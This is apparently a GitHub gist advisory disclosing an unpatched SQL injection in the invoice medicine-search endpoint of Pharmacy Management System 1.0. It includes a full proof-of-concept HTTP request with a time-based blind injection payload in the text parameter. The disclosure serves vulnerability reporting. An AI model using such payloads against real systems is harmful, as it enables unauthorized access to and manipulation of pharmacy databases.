Skip to content

Instantly share code, notes, and snippets.

@higordiego
Created October 19, 2024 15:58
Show Gist options
  • Save higordiego/be616d2853a9f1820d8558fc00e97e24 to your computer and use it in GitHub Desktop.
Save higordiego/be616d2853a9f1820d8558fc00e97e24 to your computer and use it in GitHub Desktop.

Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection
  • Severity: CRITICAL
  • Status: Unpatched

Vulnerable Endpoint:

  • /php/add_new_invoice.php?action=medicine_list&text=aa

Vulnerability Description:

A critical SQL injection vulnerability has been identified in the Pharmacy Management System version 1.0, specifically during the invoice creation process. The issue lies in how the system retrieves the list of medicines based on a search query passed through the text parameter. The input is not properly sanitized, allowing attackers to inject and execute arbitrary SQL commands.

When creating a new invoice, the system queries the medicine database using the text parameter to display matching results. However, the lack of input validation makes it vulnerable to SQL injection attacks. Exploiting this flaw could allow unauthorized access to sensitive data, such as medicine inventory details, and even manipulation or deletion of records. This vulnerability is critical, as it compromises both the availability and integrity of the system. Immediate remediation is necessary to avoid disruption of pharmaceutical operations and data breaches.


Proof of Concept (PoC):

Below is an example of a GET request demonstrating how the SQL injection can be exploited by manipulating the text parameter:

GET /php/add_new_invoice.php?action=medicine_list&text='%20AND%20(SELECT%209276%20FROM%20(SELECT(SLEEP(5)))AbCg)--%20sLxQ HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/new_invoice.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

The above request injects a malicious payload into the text parameter. This payload forces the system to execute a time-based blind SQL injection, making the database sleep for 5 seconds. This confirms that the endpoint is vulnerable to SQL injection.


Burp Suite Requests:

  • Burp Suite PoC

SQLMap Exploit:

  • SQLMap PoC

External Links:


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment